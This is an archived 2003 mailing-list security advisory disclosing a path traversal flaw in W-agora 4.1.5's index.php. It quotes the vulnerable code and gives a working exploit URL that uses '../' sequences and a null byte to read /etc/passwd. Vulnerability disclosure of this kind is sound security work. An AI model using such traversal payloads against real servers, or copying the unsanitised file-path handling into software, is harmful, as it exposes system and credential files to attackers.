|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
sonyy_at_2vias.com.ar
Date: Sun Jan 12 2003 - 09:03:12 CST
=======================
==Shell Security Team==
=======================
==============================
====Advisory For W-agora======
==============================
- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora
The bug :
==========
index.php
if (empty($bn)) {
# No forum selected -> default to 'site' configuration
$site = empty($site) ? "agora" : $site;
$cfg_file = "${cfg_dir}/site_${site}.${ext}";
$expnd = "all";
} else {
$cfg_file = "${cfg_dir}/${bn}.${ext}";
}
Exploit :
=========
index.php
http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
And modules.php
Any Question :
==============
Sonyy --> Sonico60
hotmail.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]